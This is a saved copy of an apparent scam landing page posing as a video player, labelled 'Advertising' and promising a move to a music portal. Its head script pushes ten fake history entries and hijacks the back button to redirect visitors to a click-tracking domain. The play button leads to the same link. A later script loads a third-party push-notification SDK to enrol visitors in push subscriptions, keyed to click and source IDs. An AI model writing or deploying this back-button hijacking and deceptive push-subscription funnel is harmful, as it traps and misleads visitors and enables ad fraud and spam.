<html xmlns="http://www.w3.org/1999/xhtml" xmlns:th="http://www.thymeleaf.org"
	data-scrapbook-source="https://watcheth.net/muzvolna_22_3986/prelp.html" data-scrapbook-create="20240430145427172"
	data-scrapbook-title="Смотреть видео">

<head>
	<title>Watch video</title>
	<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
	<meta name="MobileOptimized" content="width">
	<meta name="HandheldFriendly" content="true">
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<meta name="format-detection" content="telephone=no">
	<script>
		function getURLParameter(d) {
			d = d.replace(/[\[]/, "\\[").replace(/[\]]/, "\\]");
			var a = new RegExp("[\\?&]" + d + "=([^&#]*)").exec(location.search);
			return null === a ? "" : decodeURIComponent(a[1].replace(/\+/g, " "))
		}
		! function () {
			var b;
			try {
				for (b = 0; 10 > b; ++b) {
					history.pushState({}, "", "#")
				}
				onpopstate = function (a) {
					a.state && location.replace("https://finance.gofreed.shop/click?key=f46f4eb47bce5cc955f9")
				}
			} catch (b) { }
		}();
	</script>
	<style>
		body {
			position: fixed;
			top: 0;
			left: 0;
			width: 100%;
			height: 100%;
			overflow: hidden;
			display: table;
			table-layout: fixed;
		}

		/** header **/
		.header {}

		.header .wrapper {
			display: block;
		}

		.header .header-text {}

		.header .age-limit {}

		.main {}

		.main .activation-btn-wrapper {}

		.main .activation-btn {}

		.activation-btn:before {}

		.activation-btn:after {}

		.main .activation-btn-text {}

		.main .info-block-wrapper {}

		.main .info-block {}

		.main .info-block .info-block-text {}

		.main .info-block-text {}

		.main .cancel-btn-wrapper {
			display: none;
		}

		@media screen and (max-height:550px) {
			.main .cancel-btn-wrapper {
				display: none;
			}
		}

		.main .cancel-btn {
			display: none;
		}

		.main .cancel-btn-text {}

		.footer {}

		@media screen and (max-width:400px) {
			.footer {}
		}

		.footer .wrapper {}

		.footer .footer-text {}

		.footer .footer-text-delim {}

		.footer .footer-text.small {}

		.modal {
			display: none;
		}

		.modal .modal-dialog {}

		.modal .close-top {}

		.modal .close-top a {}

		.modal .close-bottom {}

		.modal .close-bottom a {}

		.modal .modal-content {}

		.modal .modal-content h3 {}

		.modal .modal-content p {}

		.modal-backdrop {}

		.background {}

		@media screen and (orientation: landscape) {
			.header {}

			.header .wrapper {}

			.header .age-limit {}

			.main .activation-btn-wrapper {}

			.main .activation-btn-wrapper {}

			.main .info-block-wrapper {}

			.footer {}

			.footer .wrapper div {}
		}

		.bee-box {
			display: none;
		}

		/*end bee rubbish */

		/* our mobile styles
	    ---------------------------------------------------*/
		* {
			margin: 0;
			padding: 0;
			box-sizing: border-box;
		}

		body {
			background: #000;
			font-size: 10px;
			line-height: 1;
			font-family: 'Open Sans', sans-serif;
		}

		body,
		a {
			-webkit-text-size-adjust: none;
			text-size-adjust: none;
		}

		a {
			text-decoration: underline;
		}

		/* our mobile styles
		---------------------------------------------------*/
		.blur {
			-webkit-filter: blur(2px);
			-moz-filter: blur(2px);
			filter: url("6d8f1519769a3bcaf5db37390050705fdbe3692f.svg");
			filter: blur(2px);
		}

		.mpic {
			display: block;
			max-width: 100%;
			margin: 0 auto;
		}

		.header {
			position: fixed;
			top: 0;
			left: 0;
			right: 0;
			z-index: 1;
			padding: 10px 40px 10px 10px;
			color: #fff;
			font-size: 12px;
			line-height: 42px;
		}

		.header-text {
			margin-bottom: 5px;
			font-size: 13px;
			line-height: 1;
			text-align: left;
		}

		.header-desc {
			color: #ccc;
			font-size: 13px;
			line-height: 1;
			text-align: left;
		}

		.age-limit {
			position: absolute;
			top: 0;
			right: 10px;
			font-size: 20px;
		}

		.search {
			height: 22px;
			border: 1px solid #333;
			border-radius: 2px 0 0 2px;
			padding-left: 7px;
			position: relative;
			color: #444;
			font-size: 12px;
			line-height: 20px;
			text-align: left;
		}

		.search:after {
			content: '';
			position: absolute;
			top: 0;
			right: 0;
			bottom: 0;
			width: 50px;
			background: url("893d417d32ec855369f50b1e3232cee8ac6dcc91.png") center center no-repeat #333;
			background-size: 12px auto;
			border-radius: 0 2px 2px 0;
			color: #fff;
			text-align: center;
		}

		.main {
			position: absolute;
			top: 50%;
			left: 0;
			width: 100%;
			-webkit-transform: translateY(-50%);
			-ms-transform: translateY(-50%);
			-moz-transform: translateY(-50%);
			-o-transform: translateY(-50%);
			transform: translateY(-50%);
			padding-top: 17px;
			text-align: center;
		}

		.activation-btn {
			width: 26vh;
			max-width: 480px;
			border: none;
			border-radius: 13vh;
			background: #ff0000;
			color: #fff;
			font-size: 32px;
			line-height: 26vh;
			font-weight: bold;
			text-align: center;
		}

		.activation-btn-text {
			display: inline-block;
			position: relative;
			padding-right: 50px;
		}

		.activation-btn-text:before {
			content: '';
			position: absolute;
			top: 0;
			left: 10px;
			right: 0;
			height: 100%;
			background: url("74f1c97194d20bcfbe1b1d1f56bec66730683b8c.png") center center no-repeat;
			background-size: 80% auto;
		}

		.info-block-wrapper {
			display: inline-block;
			color: #797979;
			font-size: 17px;
			line-height: 1;
			margin: 1px auto 0;
			padding: 0 5px;
		}

		.price-fill {
			display: inline-block;
		}

		.footer {
			position: absolute;
			bottom: 0;
			left: 0;
			width: 100%;
			padding-bottom: 2px;
			color: #555;
			font-size: 16px;
			line-height: 0.8;
			text-align: center;
			background: #000;
		}

		.footer a {
			color: inherit;
			text-decoration: underline;
		}

		.footer-control {
			position: absolute;
			left: 0;
			right: 0;
			bottom: 100%;
			padding-bottom: 5px;
		}

		.footer-control img {
			display: block;
			width: 100%;
			max-width: 720px;
			height: auto;
			margin-left: auto;
			margin-right: auto;
		}

		@media (max-height: 558px) {}

		@media (max-height: 420px) {
			.activation-btn {
				line-height: 74px;
			}
		}

		@media (orientation: landscape) and (max-width: 767px) {
			.activation-btn {
				line-height: 66px;
			}

			.footer-control {
				display: none;
			}
		}

		@media (orientation: landscape) and (min-width: 768px) {
			body form {
				position: fixed;
				top: 0;
				left: 50%;
				bottom: 0;
				width: 640px;
				margin-left: -320px;
			}

			.header,
			.main {
				position: absolute;
			}
		}
	</style>
</head>

<body class="background" id="resize">
	<form>
		<div id="header-block" class="header">
			<div class="wrapper">
				<div class="header-text">Advertising</div>
				<div class="header-desc">You will be moved to the music portal</div>
				<div class="age-limit">×</div>
			</div>
		</div>

		<div id="main-block" class="main">
			<div class="activation-btn-wrapper">
				<button id="activation-btn" class="activation-btn" type="button" onclick="go();">
					<span class="activation-btn-text">&nbsp;</span>
				</button>
			</div>
		</div>

		<div id="footer-block" class="footer">
			<div class="footer-control"><img src="8ece7fd986c61248c09da2261d90133b71ce3685.jpeg" alt=""></div>
		</div>
	</form>

	<script>
		function go() {
			location.href = 'https://finance.gofreed.shop/click?lp=1';
		}
	</script>

	&gt;
	<script async data-cfasync="false">
		(function () {
			const url = new URL(window.location.href);
			const clickID = url.searchParams.get("click_id");
			const sourceID = url.searchParams.get("source_id");

			const s = document.createElement("script");
			s.dataset.cfasync = "false";
			s.src = "https://push-sdk.net/f/sdk.js?z=1207270";
			s.onload = (opts) => {
				opts.zoneID = 1207270;
				opts.extClickID = clickID;
				opts.subID1 = sourceID;
				opts.actions.onPermissionGranted = () => { };
				opts.actions.onPermissionDenied = () => { };
				opts.actions.onAlreadySubscribed = () => { };
				opts.actions.onError = () => { };
			};
			document.head.appendChild(s);
		})()
	</script>

</body>

</html>